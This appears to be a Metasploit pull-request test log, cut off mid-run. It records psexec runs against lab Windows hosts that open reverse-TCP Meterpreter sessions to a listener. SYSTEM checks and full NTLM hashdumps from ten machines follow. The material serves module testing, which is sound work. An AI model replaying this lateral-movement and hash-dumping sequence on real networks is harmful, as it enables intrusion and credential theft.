Users : 2 Meterpreter : x64/windows msf6 exploit(windows/smb/psexec) > sessions -C getuid [*] Running 'getuid' on meterpreter session 1 (10.5.134.111) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 2 (10.5.134.132) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 3 (10.5.134.145) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 4 (10.5.134.149) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 5 (10.5.134.150) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 6 (10.5.134.151) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 7 (10.5.134.152) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 8 (10.5.134.157) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 9 (10.5.134.171) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 10 (10.5.134.192) Server username: NT AUTHORITY\SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 1 (10.5.134.111) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 2 (10.5.134.132) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d8384ae77d76137afd52d904f6e23a56::: [*] Running 'hashdump' on meterpreter session 3 (10.5.134.145) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 4 (10.5.134.149) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 5 (10.5.134.150) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:96811640642b7e8a6465a8d64208da82::: [*] Running 'hashdump' on meterpreter session 6 (10.5.134.151) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:11ba4cb6993d434d8dbba9ba45fd9011::: [*] Running 'hashdump' on meterpreter session 7 (10.5.134.152) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3ef1bcaa8bac173c69ea6636117eec5c::: [*] Running 'hashdump' on meterpreter session 8 (10.5.134.157) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7ee181ddb6556b468f3af0a9036cfa5f::: [*] Running 'hashdump' on meterpreter session 9 (10.5.134.171) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 10 (10.5.134.192) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6e8ef0961855a7312b15a5b80e73c29c::: msf6 exploit(windows/smb/psexec) > ```

bwatters-r7 commented 10 months ago

:green_circle: Windows 10x64 WOW64

``` msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.111 rhost => 10.5.134.111 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.111:445 - Connecting to the server... [*] 10.5.134.111:445 - Authenticating to 10.5.134.111:445 as user 'vagrant'... [*] 10.5.134.111:445 - Selecting PowerShell target [*] 10.5.134.111:445 - Executing the payload... [+] 10.5.134.111:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.111 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 11 opened (10.5.135.201:4444 -> 10.5.134.111:49793) at 2024-01-18 14:17:04 -0600 [*] Session 11 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.132 rhost => 10.5.134.132 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.132:445 - Connecting to the server... [*] 10.5.134.132:445 - Authenticating to 10.5.134.132:445 as user 'vagrant'... [*] 10.5.134.132:445 - Selecting PowerShell target [*] 10.5.134.132:445 - Executing the payload... [+] 10.5.134.132:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.132 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 12 opened (10.5.135.201:4444 -> 10.5.134.132:49809) at 2024-01-18 14:17:07 -0600 [*] Session 12 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.145 rhost => 10.5.134.145 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.145:445 - Connecting to the server... [*] 10.5.134.145:445 - Authenticating to 10.5.134.145:445 as user 'vagrant'... [*] 10.5.134.145:445 - Selecting PowerShell target [*] 10.5.134.145:445 - Executing the payload... [+] 10.5.134.145:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.145 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 13 opened (10.5.135.201:4444 -> 10.5.134.145:49762) at 2024-01-18 14:17:11 -0600 [*] Session 13 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.149 rhost => 10.5.134.149 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.149:445 - Connecting to the server... [*] 10.5.134.149:445 - Authenticating to 10.5.134.149:445 as user 'vagrant'... [*] 10.5.134.149:445 - Selecting PowerShell target [*] 10.5.134.149:445 - Executing the payload... [+] 10.5.134.149:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.149 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 14 opened (10.5.135.201:4444 -> 10.5.134.149:49518) at 2024-01-18 14:17:15 -0600 [*] Session 14 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.150 rhost => 10.5.134.150 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.150:445 - Connecting to the server... [*] 10.5.134.150:445 - Authenticating to 10.5.134.150:445 as user 'vagrant'... [*] 10.5.134.150:445 - Selecting PowerShell target [*] 10.5.134.150:445 - Executing the payload... [+] 10.5.134.150:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.150 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 15 